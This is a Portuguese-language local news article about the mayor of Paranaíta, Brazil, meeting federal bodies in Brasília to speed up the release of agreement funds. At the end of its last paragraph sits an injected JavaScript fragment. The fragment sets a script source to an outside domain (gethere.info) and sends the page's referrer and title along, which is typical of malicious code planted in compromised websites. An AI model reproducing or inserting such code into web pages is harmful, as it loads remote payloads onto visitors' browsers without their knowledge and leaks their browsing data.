Capa / Cidades / Em viagem à Brasília, prefeito pede agilidade em liberação de convênios para Paranaíta

Em viagem à Brasília, prefeito pede agilidade em liberação de convênios para Paranaíta

Em viagem à Brasília, prefeito pede agilidade em liberação de convênios para Paranaíta-1Assessoria de Imprensa

O município de Paranaíta tem uma série de convênios empenhados com o Governo Federal em fase de avaliação. Para conseguir a agilidade dos órgãos na liberação dos recursos, o prefeito Tony Rufatto, em companhia do secretário de Planejamento e Meio Ambiente, Osmar Moreira e o técnico Paulo Henrique Correia, viajou para Brasília onde cumpriu agenda na segunda e terça-feira.
Na segunda-feira, o gestor e secretários municipais tiveram reuniões proveitosas. Primeiro na sede da AMUSUH – Associação Nacional dos Municípios Sedes de Usinas Hidrelétricas – e em seguida na FUNASA. No órgão federal, a pauta foi a doação do terreno de 44 mil metros quadrados para o município, onde estão instalados vários prédios públicos, como o PSF 1 e Laboratório Municipal.
No dia seguinte, as audiências foram no Ibama e Casa Civil do Governo Federal. Na audiência com a presidência do Instituto Brasileiro de Meio Ambiente e Recursos Naturais Renováveis, o prefeito Tony Rufatto fez cobranças importantes sobre responsabilidades das usinas hidrelétricas nas áreas de Saúde, Educação, Infra estrutura, Saneamento e Segurança Pública.
Já na Casa Civil, o gestor pediu agilidade na liberação de recursos de convênios com o INCRA e entre outros. Um dos convênios citados no encontro, no valor de R$ 1,2 milhão, busca melhorar a infraestrutura no Assentamento São Pedro. O prefeito acredita que a partir dessas audiências, Paranaíta terá mais prioridade por parte dos órgãos do Governo Federal.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top